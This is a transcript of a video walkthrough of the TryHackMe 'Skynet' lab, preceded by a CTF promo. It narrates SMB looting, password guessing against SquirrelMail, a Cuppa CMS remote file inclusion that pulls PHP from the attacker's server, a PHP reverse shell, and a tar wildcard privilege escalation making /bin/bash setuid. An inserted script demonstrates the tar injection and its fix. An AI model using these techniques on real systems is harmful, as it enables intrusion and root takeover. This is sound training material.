Next Tuesday, GuidePoint Security is hosting yet another capture the flag event, all online, totally free. Anyone can access the game and play and you absolutely should be there. I wanna see you on the scoreboard. So the game starts February 16th, next Tuesday at 8 a.m. Eastern time and it runs a whole week. It'll close on Monday, February 22nd at 5 p.m. Eastern time. The first person to solve all the challenges, or whoever gets the most points, will win and take home a $100 gift card. There is one thing that I would like to emphasize though, and that is that this capture the flag event is different than the previous ones that GuidePoint Security has put on. Yes, the challenges will range from beginner to advanced in difficulty, but this time there will not be any walkthroughs for the challenges. You'll still have to do some critical thinking and problem solving the way that you always do as a real hacker. You can register online with the link in the description and once you're set you'll be emailed your secret passphrase to be able to log into the game, access the VPN, and you'll be off to the races once next Tuesday, February 16th comes along. So I'm super excited for the game. GuidePoint Security has put out an incredible set of capture the flag events recently and I'm really looking forward to this one. I hope to see you on the scoreboard. In this video, I wanna take a look at the Skynet room from TryHackMe. I am logged in on their website, connected to the VPN, and I have the room opened up in my web browser here. You can see the description is a vulnerable Terminator-themed Linux machine. So I have joined the room and deployed the machine. I have the IP address ready here for us and we can go ahead and start to poke at this machine.
I will hop over to my terminal where all the good stuff happens and I'll make a directory for Skynet YouTube and inside of that directory I'll also make an nmap folder so we can kind of store our nmap scans and that logging in its own kind of custom designated location. So I'll go ahead and run nmap to scan the box. I'll use -v for verbose so that way I can see all the discovered ports as nmap finds them. I'll use -sC for default scripts, -sV to enumerate versions, -oN to output in nmap's normal format. I'll throw it in that nmap directory that I just created with the initial file name and I'll slap in the IP address, or just paste that there. Now when we go ahead and run this we should see this nmap running off to the races. Looks like it discovered port 445, port 139, 110, 80, 143 and port 22. Okay, so we already have a lot of good stuff to work with. I'll wait for this nmap scan to finish, which it just did. So I will go ahead and open up those nmap scan results. We do of course see that port 22 for SSH. It is in fact an Ubuntu Linux machine that we are up against. Looks like it's running Apache for the web server on that port 80 here and I can see references to Skynet repeatedly. Looks like that is the host name or the computer name of this box and it has seemingly a mail service up and running for that POP3 Dovecot on port 110 there. Of course there is SMB open on port 445 so that might have some interesting shares we could look through, but at this point I think we have enough to go off of if we could go ahead and enumerate those web services as well as the SMB or Samba share, because we won't have credentials off the bat to log in via SSH but we can go ahead and explore. So I will go ahead and start a Nikto scan along with a GoBuster scan to kind of have some enumeration going on in the background for us and I'll get started with a GoBuster scan in dir mode with a URL specified with -u.
I'll paste in that IP address and I'll use the -w argument to specify a word list. I will use the directory-list-lowercase-2.3-medium which is the default that comes with DirBuster. So if I let that spin, I should be able to go explore this manually on my own. I'll hop over to that IP address in my web browser and it looks like I'm greeted with sort of like a Skynet search engine. Looks a little bit like Google but I don't seem to go anywhere when I search anything or click any of the buttons. I'll hit Ctrl+U to view the source in my web browser. You could have right clicked and selected view source, but there's nothing really interesting here. Looks like this is just kind of flat HTML. I see just a CSS style sheet but of course that's gonna be static, nothing particularly useful or interesting there. So I don't know where more we could go off of with just that. It looks like we did have some interesting results from our GoBuster scan. I see /admin, /css, /js, /config and /ai. We can explore some of those. I'll go to /admin but that looked like it got a 301 so it looks like I won't be able to access those things. /css, same thing, /js, same thing, /ai, same thing. So not a lot of headway in that direction. We should keep in mind though that we focused specifically on the HTTP service right now on port 80. There was however another port open and that was SMB. So we could explore that a little bit. Let me move down and explore with enum4linux. So enum4linux is gonna end up doing a great job to scan for SMB services. You could use something like, or SMB share, sorry. You could use smbmap. You could use plenty of other tools. I like to use enum4linux as just kind of habit. I'll specify -a to look for all tests or as many as it could.
That's kind of just boilerplate habit at this point, but I will slap in that IP address and I will also tee that out to an enum4linux log and I will let that cruise through and see if it can find anything interesting. Looks like it does see this Skynet target and it is a Unix server here running with Samba. Looks like it did find some shares, okay. It found print$ and IPC$. Those are kind of boilerplate. You'll see those commonly. However, this anonymous one and milesdyson are totally out of left field. Those are new and unexpected. So it looks like that is a Skynet anonymous share and a Miles Dyson personal share, okay. So that gives us some headway and it looks like now it's going to try to enumerate users, but we can start to poke at and explore these SMB shares. So you could do this kind of with your file browser. If you're using Nautilus or Thunar or whatever, you could Ctrl+L to get into the location bar and then type in like smb:// to represent that SMB protocol and then you can access shares just through your graphical user interface in your file browser. That would be fun. That would be cool. I won't do that. I will showcase the other rendition where we're just using smbclient. Ooh, actually looking back at our GoBuster scan I see that it found SquirrelMail, which is a new location that might be worthwhile for us to check out before we go look at those SMB shares. Looks like it is SquirrelMail version 1.4.23 by the SquirrelMail Project Team, okay. I am just going to open up another terminal and try and run searchsploit on SquirrelMail to see if it actually gets anything interesting or worthwhile from that version number. Okay, it looks like less than 1.4.22 there is remote code execution but we are on 1.4.23. So that probably won't get us a lot further. So we don't know a username and password here but we know Miles Dyson potentially might be a user.
That's kind of a weird like share drive name, but let's go ahead and just enumerate those shares, right? I'll go ahead and use smbclient. That anonymous share is very likely going to be something that we can access anonymously without credentials. Miles Dyson, if that's a personal share, maybe that would require Miles Dyson's password, but we can kind of go verify that and try that. So I will use smbclient with the IP address here and I'll specify the anonymous share. That doesn't seemingly have enough backslash characters. It's probably going to be interpreted as escape sequences. So I will wrap that in those single quotes. There we go. Now Bash would interpret it properly, right? It's gonna ask for my like WORKGROUP\john, john being my username, and password. That's totally fine. We're gonna try and log in anonymously. So I'll just hit enter here and it looks like it did connect. So if I were to ls, or kind of like look around and just list stuff in the current directory, looks like I have an attention.txt and a logs directory. So I will get that attention.txt. There we go, that pulled that down and I'll move into that logs directory and also see what we have here. log1, log2, log3. Okay, it looks like log1 is the only thing with actual contents. Looks like everything else has a size of zero. So I'm just gonna get log1.txt, and that pulled that down, great. So now I can seemingly exit because there's nothing else in this share for me to look at. This period and double period just kind of refer to other folders, but there's nothing else that I could really explore there. So let's go ahead and exit out of that and now let's cat that attention.txt that we pulled down. It says a recent system malfunction has caused various passwords to be changed. All Skynet employees are required to change their password after seeing this. Roger. What about that log1.txt? Oh, what the heck is this?
That looks like potential passwords or like a password list, right? Random numbers at the end here, all with kind of a Terminator Skynet theme, okay. Are these going to be passwords that we could maybe use to get into SquirrelMail? Oh, thank you LastPass. No, you don't need to save that password. Let's go back to the login page and we could try like a username miles or milesdyson. Let's try, just grab this top one here. miles, spit that in, loading. Okay, SquirrelMail takes forever, which is surprising considering the name. Okay, nope, that failed. LastPass is off to the races again. Let me try that milesdyson, spit that in. Oh, okay, that got it. So we kind of got lucky and it was just the very, very first password. Truthfully, I would have written something to like brute force this. I will just mentally run through that if that's okay with you because I think it will just go to show really what's happening here. So whenever you have a form like this that you kind of want to brute force, yeah, you could do it with Hydra. I know a lot of people will probably give me hate because I don't like to deal with Hydra. The syntax makes my head hurt. I would just kind of whip this out in Python and that's maybe a fault of mine, but I can see that, okay, it takes a password as the input type, obviously. It takes a login name kind of as a password here, or excuse me, as another input field, and it submits it all to a form with redirect.php. So what I would do, honestly, rather than looking at that HTML code is I would just open up the developer tools. So I'll hit F12 and then I'll type in like name and password for these fields. There we go. And then this page here, after Chrome goes crazy. Yeah, I know that's a bad password, Chrome. This redirect.php like POST request that's sent. You could go ahead and right click on that and just say, hey, copy as cURL, and then check this out.
There is a curl-to-Python-requests utility that does a really good job of just, okay, grabbing that syntax and then making it the Python code that you might want to use. Grabbing the cookie, grabbing the session information, grabbing the same headers, the content type, user agent, et cetera, et cetera, et cetera. So that is kind of handy for what you're up against. I'll go ahead and mess with that now. Now that we have this log1.txt file, we can try like a SquirrelMail bruter .py script. And I will just crank out #!/usr/bin/env python3. We'll have a URL. Actually, we'll just go ahead and slap in all this. We'll import requests and we will create a response object after we POST to that page with the headers, the cookies, the data, et cetera, et cetera. We will need to, however, tweak the data because we're not just going to want to send it this static password every time. We're going to end up wanting to change the name and password as to what we're looking at. So I'll go ahead and import, I'll grab it from pprint. So I have pretty print, from pprint import pprint. And let's go ahead and open that log1.txt. And I'll read everything out of it. This is super duper dirty, but I would just kind of do like a, oh, passwords is going to equal the contents of that, split on newlines, and then I'll like make it a list comprehension so I can do like x.strip() for every x in that thing if there is an x there. So that way I split on newlines and absolutely make sure there are not going to be any newline characters in the contents because I've stripped them all out. And if it's an empty string, if it wasn't properly able to get a line or there was no line there, it will just go ahead and remove it with that if x. So at that point, if I were to pprint passwords, we should see all that spit out with all of our lines there. We just created a simple list grabbing everything from that and now we can work through that.
So we know our username should be milesdyson and we could have finagled that with like miles or dyson or mdyson or however you wanted to. But then we'll go ahead and loop for password in passwords. We can indent all this, go ahead and grab the response object, but we'll need to change our name to our username and our password to be the variable password as that changes every time. So at that point, I'd probably wanna check like, hey, the return code. Is this actually going to give me a response status code that tells me I redirected or successfully logged in? We can try to see how that looks, but I think we'll come to find out that SquirrelMail is doing kind of weird things and that, okay, it's gonna give us a 200 every time whether or not we have the right password. So that's not all that helpful. Again, admittedly, this is also very, very slow. So if we wanted to really weaponize this we could probably make it threaded and maybe not have to deal with all the time it takes for SquirrelMail to get through each of those responses. Anyway, let's go ahead and just grab the response.text, and we knew when we failed to log in earlier it gives us this "Unknown user or password incorrect" error. So I'll just go ahead and look for that string. I'll just do a simple like if "Unknown user or password incorrect" in response.text, then we know, okay, it's a bad password. So we can actually test if it's not in there. And then if that's the case, we'll go ahead and print out the password that we found and like, hey, we found it or something. Potential password found. And like, that's all we need to do. Now, obviously, because we know, oh, it's the first password, because we sort of went through that manually and we just got lucky. Sure, that would really not be that helpful for us because it spits it out immediately.
But if we were doing something else and it was further along in that word list, you could have a display out of trying this password and then, okay, we finally found this one eventually. So you could run that in the background if you wanted to. But that was it. Sorry for that fire hose tangent, but that was how I would spitball just slapping that together in Python. Anyway, let's get back to our good friend SquirrelMail. We will grab that correct password to log in and we'll hop over to milesdyson, pasting in that password there. Okay, now let's be creepy and read his emails. So he has one from skynet@skynet. Looks like it's a Samba password reset. Ooh, we've changed your SMB password after the system malfunction. And now we have this password that you could use. Okay, so we wanna use that maybe for his SMB share password. And then there's binary and this other thing. I'm just gonna be cheap and go to asciitohex.com to try and see what that decodes out to. This is when you know you're legit. This is when you know you're a real hacker, when you're using asciitohex.com. Balls have zero to me, to me, to me. What? I have no idea what that is or what that's referring to. I don't know what I can, I, I, everything else. Is this like the system malfunction? Is this some Terminator reference that I don't know? That's probably it. I actually haven't seen the Terminator movies. Don't hate me. I'm not a real nerd. Okay, now that we have Miles Dyson's SMB password, we can go try and connect to that SMB share. We could have tried to log in anonymously earlier and maybe that would have got us somewhere. I'll use that smbclient to this IP address. I'll slap that in. You got your stinkin' HTTP schema. I don't want that. milesdyson was the name, but if I just try and hit enter here, okay, yeah. We would have needed a password for that. Let's grab that.
And if I try to connect with this, obviously it's thinking that I'm the WORKGROUP\john user, but no, I want to go ahead and be milesdyson. So we'll specify that as a user with that capital -U. Now trying that, I don't know if that'll let me in without specifying, oh, the host name. Okay, looks like it just did. You could very well have just entered like SKYNET/ and that will specify the host name, or a domain name if you're using like a domain user at some point. So then just slapping in that password, pasting it in. Now we are connected and it looks like we have some stuff to look at. Oh, there's a lot here. Can I make that relatively visible without obscuring what's actually happening? No, I see a lot of PDF files. And I don't know if those will be all that useful. It's like improving deep neural networks. So good luck. Natural language processing, building sequence neural networks, et cetera. That doesn't seem all that useful. There is a directory notes though. Let's hop into notes. Ooh, and now there's more markdown files. These all look like, like genuinely, literally a person's notes, like when they're studying for a test or something or for some course, foundations, not only your dynamics. Just a bunch of markdown files. Oh, there's an important.txt. Ah, okay. Let's get that important.txt if that is seemingly important. And we can try, can I mget all these things? Yes, yes. Oh, do I have to enter Y the entire time? I genuinely don't need all these things. I'm gonna remove all those markdown files. Okay. Now we have important.txt. So let's see what's in that. Add features to beta CMS /45KRA24Z7, blah, blah, blah. That might very well be a web location or like part of a URL. I can kind of, I think so by that forward slash. Work on T80 model 101 blueprints and spend more time with my wife. Yeah, that makes sense. That math checks out. Let's see if we can access that as like a location. We can.
Okay, Miles Dyson personal page. Dr. Miles Bennett Dyson was the original inventor of the neural net processor. Let me, let me, is there any links on this page? No. Okay, let's try and GoBuster that. I already have many, many terminals open. So let's run that same GoBuster with that location there. Just slapping in that path and let's run that one more time. We'll see if it gets anything interesting and then I'll keep poking around. miles.jpg is just the picture. I don't think there'll be any like wacky steganography in that. But there's nothing else on this page. We could try like /admin. No. Any /css? No. /backups? No. Is there like a .git directory or robots.txt for some weird reason? No. And GoBuster hasn't found anything. So what is that? Just a dead end. Did I just like find this for no reason? What do I do with this hidden page? Ooh, ooh, ooh, ooh, administrator. Okay. Let's get to /administrator. Cuppa CMS, use a valid username and password to gain access to the administrator. I don't wanna print that, sorry. Can I use the same credentials I had earlier? I don't think I had that saved. What was that password? Oh, I mean, we could use the one from the SquirrelMail email. No. Whatever. Is this thing just like inherently vulnerable to anything? What is Cuppa CMS? We could Google that, but I'll just check searchsploit super quickly. So searchsploit Cuppa. Ooh. Cuppa CMS alertConfigField.php local/remote file inclusion. Ooh, remote file inclusion. And it looks like it's just that thing. So let's searchsploit -m to get that in our current directory. Good. And now let's go ahead and sublime that to see what this thing is. Cuppa CMS file inclusion, back in 2013. This is PHP code injection. What? A PHP include of the request urlConfig parameter. An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. Oh, wait. PHP code in this file will be evaluated. Non-PHP code will be embedded to the output.
So it can just run PHP code. Well, that'll get us server-side, like code execution, right? So all you need to do is seemingly do some like climbing the file system tree and then we end up reading its /etc/passwd or like a location that we want. Oh, and you could do some PHP streams to get like a base64 encoded representation. Oh, that's slick. Okay. So let's grab this. And I'm gonna throw it in another directory here because I know that we're going to need to grab the actual location of this thing. This administrator, that should go to alerts/alertConfigField. So this is the string that we want, right? With our appropriate IP address, our location for Cuppa, and trying to read its /etc/passwd as a little proof of concept. So let's curl that and let's see if we get anything juicy. Ooh, we do. Okay. So we just flat out read /etc/passwd. Dope. We could read the configuration file, or we could see if it actually will run PHP code. If we're using remote file inclusion, then we could just like change this to call back to us. So if I were to, what is, if I were to like try and set up my own web server and connect back to it, I could see if that will work. What is my IP address? ip a, I guess 10 zero, it's this thing. 10.6.5685. So we'll slap that in. I'll listen on port like 8000 and then I guess we'll just go for like a poc. And I should actually make that a PHP script. So let's make a directory www. And now let's sublime like a poc.php. We'll just include PHP tags here and then run like a system function. So I can see if I can run command execution on that target. I'll run whoami and I'll use python -m http.server to spin that up. And now that that is running over there on the side, oh goodness, we have a lot of terminals open and we really don't need them. We'll host that over there and let's see if I would run that curl command to go back to my location. Will it download that? Oh, I need to actually include the curl command. That would help.
So it's gonna call back to my machine where I'm using Python to host http.server. So on port 8000, I'm hosting a little web service and it can grab poc.php. And then theoretically, ooh, it will hit it, which it did, and it would run the whoami command and we can see the output of www-data. So we do in fact have code execution. Okay, awesome. So let's now try to get a reverse shell, because if we have server-side code execution we can kind of control that machine. So let me, I'll just do like a simple netcat listener on port 8888 and I will copy over the PHP reverse shell code. If you don't happen to have that lying around, the PHP reverse shell code is something you can find on pentestmonkey.net. I've heard complaints that like pentestmonkey was down earlier, oh goodness, can I just go to the site please? Oh no. Okay, that's being weird. PHP reverse shell. Okay, they have it here on GitHub. There you go. php-reverse-shell.php. And this is the exact same code. All you need to do is change the IP address and port to your IP address. So I will grab again my IP address, slap that in there, and port 8888 is where I'm gonna have my netcat listener running. Good. So at that point, I should be able to just have it request, rather than the poc.php, we'll go ahead and grab that php-reverse-shell.php. And then back in my terminal, I should be able to curl that location and it will invoke the PHP on the target that will call back to me, theoretically. Oh, oh, oh, I didn't even have the server running. That would be why. It didn't call back and I was like weirded out because I didn't actually start the HTTP service that was hosting that PHP reverse shell. So let's run that now. Make sure our listener is up and running and we will go ahead and curl that. There we go. Saw the request in our HTTP server and have our shell callback. Okay. Let me go ahead and stabilize the shell. So I'll use, do I have Python actually? Let me, which python? I do.
All right, python -c 'import pty; pty.spawn("/bin/bash")'. I should be using pwncat for this in all honesty. stty raw -echo. Gosh, I haven't typed these commands in so long because I've just been using pwncat. We'll export TERM=xterm. There we go. Okay. Now we have a full shell. pwncat is in a little bit of a development phase. We're testing new things. So I'm not using that for the moment because people are gonna be angry. Like, how come it works on your computer and not on mine? So let's go into the home directory and see what we got here. We got milesdyson. We did land as the www-data user though, which isn't extremely helpful because we probably need to privilege escalate to do something better. But we wanna see if we can grab this user.txt flag or prove that we have like local command access. So let's change directory into that milesdyson friend here and he does have a user.txt in here. Can I read that? It is world readable. Okay. So let's just simply cat out that user.txt and there we go. We have that flag to submit. Now we sort of need to be able to privilege escalate and see what we can do to become root or this milesdyson user. Can I sudo -l? Nope. I need a password which I don't have. Let's just try and run linpeas. So I will hop over to my shared memory directory, or /dev/shm, and I am going to actually use this Python web server a little bit more, but I'm just gonna copy over linpeas and put it in the same directory so that way it's still currently being served. That way I can go ahead and wget a http:// of that IP address and port number for my machine and we'll go ahead and grab that linpeas.sh. Takes some time to download that. Good. Now it's on the target. I can go ahead and run it and let's see if that gets any good stuff. linpeas is cruising. We'll take a break. We'll take a quick drink break to let that finish and we can start to kind of look through some of this output.
linpeas is super good though because it will give us that legend or color key as to the things that are very likely a privilege escalation vector, and we can start to cruise through here. Kernel version Ubuntu 16.04, old version of sudo. Ooh, CVE-2021-3156, am I right? Processor information and things. A lot of useful software there. We have GCC. Also have LXC, that's kind of weird, for containers. A lot of processes running. Nothing extremely interesting with that for the moment. Cron jobs. Oh, there is a root cron job. cron.hourly, cron.monthly, cron.weekly. Ooh, and there's an entry in here. Oh, every minute, root runs /home/milesdyson/backups/backup.sh. Oh, that was in the directory and I didn't even pay attention to it. I didn't even see the thing. Well, that's gotta be useful, right? All right, let's stop linpeas and let's just go look at that /home/milesdyson/backups. backups, ls -la. I didn't even look in share, mail and backups. I was just cruising right through it. Oh yeah, backups is owned by root, that's kind of weird. It is world readable and executable though, so we can go ahead in there. It also has a backup.sh script, which we just saw from that cron job running every minute. Root is gonna run this script, and a backup.tgz. I cannot modify that file because it's owned by root and it doesn't have write permission for me, but we can read that backup.sh script. linpeas, go away. So we'll cat that out. Looks like it just starts a bash script, right? That's all it is. And it changes directory into /var/www/html, so the web service, and it tars, it creates a tar archive outputting to, oh, this backup.tgz every minute we saw from that cron job, and it uses an asterisk here. Ooh, that backup.tgz was created just today. So that time is different than all the others, right? So we know that that's actively being used, that cron job is working.
So with that syntax of this cat, with this backup.sh script here that we cat out, /var/www/html has all the files that are being included in this backup.tgz and it's tarring it all with a wildcard. So maybe this comes from like the familiarity and just, I don't know, the exposure to some of the stuff because I play a lot of these silly games and try to get internet points that aren't real, but the asterisk and the wildcard used in the command line can be abused. So in /var/www/html, it's gonna be globbing all those files because of that asterisk, but we might be able to make that messy because we could inject, quote unquote, or put in place some command line arguments for the tar program. And tar can be used as a GTFOBin or some like living off the land native binary to Unix and Linux that will escalate our privileges or do something interesting. So that's a known thing and a known technique and I'll Google that and show you that if you do tar wildcard exploit. Yeah, yeah, yeah. Exploiting wildcard for privilege escalation right here, and I'll show you a little bit of kind of what this discusses. We'll cover wildcard injection, talking a little bit about it here, wildcards, asterisk, question mark, brackets can be used as well. So here they show this example, right? They create some directories. We create a file here, file1 and file2 and we also name a file --help. It's weird, but we're naming a file. That file has the file name --help. So when you try and cat those out, the same way you would as if the wildcard was being interpreted, you're gonna cat out file1, you're gonna cat out file2 and you're also gonna cat out --help, but that --help will be evaluated and interpreted and understood as parameters to the cat command.
So you can use this with other programs that are obviously going to end up being much more dangerous than simply cat or the --help argument, but he goes through an example where he showcases, oh hey, I have all these files in my current directory but I'm gonna make them be owned by someone else because we know the chown command is gonna be used. They use --reference to indicate, hey, that's actually going to change all the other files you suggested back to a different file that is already specified. So they're using that my.php example here and that way all of those files previously owned by Raj or RHA are now going to be owned by Ignite because of that --reference file. It used that my.php which was owned by Ignite and that just got sprayed to all the other files. Very cool, very neat, that's the idea, but they do showcase a similar example here using tar running every minute in the cron job, running backups with an asterisk file. So that's kind of exactly what's happening. They showcase this example, they're using msfvenom. We don't need to use msfvenom because that's gonna take a lot more time and be more clunky than we need to, but what they do is that they create another shell script, can this thing stop? There we go, that was really annoying that it just kept, and that won't even expand. This is stupid, I don't like this thing just popping up and down, here's what we'll do. Can I copy all this maybe? Copy, what? There we go, okay. Now we can actually explain this without fighting over stupid things. Our code, we have bad malicious code or whatever we want to run put into our own shell.sh script and then these arguments or these new files we're creating, --checkpoint-action=exec=sh shell.sh. It's going to run this script that we've specified and these checkpoint action arguments are arguments to that tar program and it's gonna actually run them with this --checkpoint=1 setup.
So then when this tar command is actually executed (and we aren't going to run this manually, we don't want to run this ourselves, because that's going to end up running with the same privileges as our current user, www-data), we want to let root run this, because root is running it every minute. Because we've set up these files and they're in place in the current directory, that wildcard will expand them and it'll interpret them, and tar will execute this stuff, and that way our malicious shell.sh, or whatever file name or code we want to run, will be executed as root, and that is how we can escalate our privileges. So what I will do, and you guys know this kind of technique that I love, is check out /bin/bash. /bin/bash is currently owned by root, and it's just a regular binary, but I love, I love, and this is way too common for me, I do this all the time because it's so quick and easy: don't need to get another reverse shell, don't need to spin up msfvenom. I'm going to have root make /bin/bash a setuid binary, so that I can just invoke it and become root as needed. So if I were to run /bin/bash right now, it puts me in a subshell; it doesn't look like anything changed, but if I were to try and exit, that's because I was in a subshell. When /bin/bash is a setuid binary, if I invoke it with -p, I could run whoami and I would have the privileges of the user that this file is owned by, right? That's what the setuid bit will allow us to do. Right now it isn't setuid, so I'm not root, but since we can weaponize and use this tar exploit, this tar wildcard expansion, to do that, that's what we'll do. So, all right. Let's simply use printf to get a shebang line in here, and I'm going to use single quotes because I know that this hash, octothorpe, is going to be a problem for bash.
So I'll specify my shebang line and I'll use a newline here, and that's why I'm using printf, because I don't like to deal with it in bash, or sorry, in echo, and then we'll go ahead and chmod +s on /bin/bash. There we go. And once that is executed every minute, we should see that /bin/bash is going to be marked as setuid, so that it will be executable for us and we can run as root. Then we'll go ahead and create all these files that are necessary for tar, and we will not run this tar command on our own, but we'll wait until the clock strikes a new minute, and that way we should be able to run bash as needed and do our privilege escalation. So let me check this out in a linear fashion. I'll run ls -la /bin/bash. I'll check the current date and time; looks like we're 46 seconds into the minute, so I have eight seconds left. We've got to be quick. We'll spit that in. Oh, actually, I was wrong: we can't currently write in this backups directory. Don't forget that backup.sh is running out of /var/www/html; all these files it's pulling are in that directory. So we've got to hop over to that directory. Good. Now this directory is going to be owned by www-data because it's the website directory. So if I were to check the date one last time... let's check our bash setuid. It's not setuid; we've got 30 seconds. So let's slap in the shell.sh. Let's create that --checkpoint-action file, and let's create this --checkpoint file. Now if I were to ls, we can see all those exist. I'll check the date. We've got 15 seconds left. Let's run another ls -la on /bin/bash to see if it's changed to a setuid binary. It hasn't yet; we're still waiting for the minute to come through. So I'll use date one more time... now we're totally past the minute, and just a hot second: ls -la /bin/bash. Now we should be able to see that that is a setuid binary. Perfect, okay. We've done our privilege escalation at this point, and we can just invoke bash as root: /bin/bash -p. It's a setuid binary now.
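The tar wildcard injection walked through above, reproduced as an added, self-contained example that is not from the video or the TryHackMe room: it stages the same two option-shaped filenames and a shell.sh payload in a throwaway directory and runs the same kind of command the room's backup.sh runs (tar cf ... *), but as the current user, so nothing touches /bin/bash or runs as root. The payload just drops a marker file (a stand-in for chmod +s /bin/bash), and the directory and marker names are made up for the demo. It also runs the hardened form of the backup command so you can see the difference. It needs GNU tar, since --checkpoint and --checkpoint-action are GNU extensions.

```shell
#!/bin/sh
# Added example, not code from the video or the room.
# Shows GNU tar wildcard (argument) injection in a sandbox as the current user.

# Stage a fake web root containing the payload and two files whose names are
# tar options, then run the vulnerable backup command. Returns 0 if the payload
# ran (the marker file exists), 1 otherwise.
demo_tar_wildcard_injection() {
    work=$(mktemp -d) || return 1
    marker="$work/payload-ran"   # hypothetical marker; stands in for chmod +s /bin/bash
    mkdir "$work/html" || return 1
    (
        cd "$work/html" || exit 1
        echo '<h1>site</h1>' > index.html   # an ordinary file, as in a real web root

        # The payload. In the room this line would be: chmod +s /bin/bash
        printf '#!/bin/sh\ntouch "%s"\n' "$marker" > shell.sh

        # Files whose NAMES are tar options. When the shell expands *, these
        # names are handed to tar as arguments, not as files to archive.
        echo '' > '--checkpoint=1'
        echo '' > '--checkpoint-action=exec=sh shell.sh'

        # The unquoted * is the bug (same shape as backup.sh's
        # "tar cf /var/backups/backup.tgz *"). tar now sees --checkpoint=1 and
        # --checkpoint-action=exec=sh shell.sh and runs shell.sh at the first
        # checkpoint, with tar's privileges and cwd.
        tar cf "$work/backup.tgz" * 2>/dev/null
    ) || { rm -rf "$work"; return 1; }
    ran=1
    [ -f "$marker" ] && ran=0
    rm -rf "$work"
    return $ran
}

# Same staging, but the backup command is written the safe way: "--" ends
# option parsing and "./*" makes every expanded name start with "./", so a
# file called --checkpoint=1 is archived as ./--checkpoint=1 instead of being
# parsed as an option. Returns 0 if the payload did NOT run.
demo_tar_wildcard_fixed() {
    work=$(mktemp -d) || return 1
    marker="$work/payload-ran"
    mkdir "$work/html" || return 1
    (
        cd "$work/html" || exit 1
        printf '#!/bin/sh\ntouch "%s"\n' "$marker" > shell.sh
        echo '' > '--checkpoint=1'
        echo '' > '--checkpoint-action=exec=sh shell.sh'
        tar cf "$work/backup.tgz" -- ./* 2>/dev/null
    ) || { rm -rf "$work"; return 1; }
    ok=1
    [ -f "$marker" ] || ok=0
    rm -rf "$work"
    return $ok
}

if demo_tar_wildcard_injection; then
    echo "vulnerable backup: payload executed via tar --checkpoint-action"
fi
if demo_tar_wildcard_fixed; then
    echo "fixed backup (tar ... -- ./*): payload did not execute"
fi
```

The root-owned cron job in the room is what turns this from a parlor trick into a privilege escalation: the expansion and the checkpoint action are identical, only the user running tar changes. When you audit a backup script, the check is simply whether a glob is passed unquoted to tar (or chown, rsync, and similar) without a preceding `--` or a `./` prefix.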
So I am in fact root. Very cool, very fun. That was a blast. I like seeing that tar wildcard expansion. So let's move into that root directory and let's grab that root.txt. There we go. We can go ahead and submit that, and at that point we have everything that we needed for this room. We found Miles' password; we did that with a little bit of brute force, sort of, with that SquirrelMail. We found the hidden directory by exploring those SMB shares. We saw the remote file inclusion that we could use with that Cuppa CMS, and that's how we got our PHP injection in. We landed as www-data to get kind of low-privilege access and command, like remote code execution, a shell that gave us our user flag, and we just privesced with that tar wildcard expansion to find the root flag. And that was that. Oh boy, this turned into a super long video. Holy crap, but I hope you had fun. I hope that you had just as much fun as I did. I've been screaming and recording doing this for a little bit, way too long, so my voice is kind of falling apart here. But thanks so much for watching, everybody. Hey, please do tune into that GuidePoint Security CTF; you can see the promo for that at the beginning of this video. I hope you enjoyed this video. I hope you're excited for more, because we're going to do a little bit more; we're going to keep it coming. And please do all those YouTube algorithm things: I'd love to see you subscribe, maybe leave me a comment, maybe like the video. I'm super duper thankful. So thanks so much, everybody. That is the end of the video. I'll see you in the next one. I love you. Take care.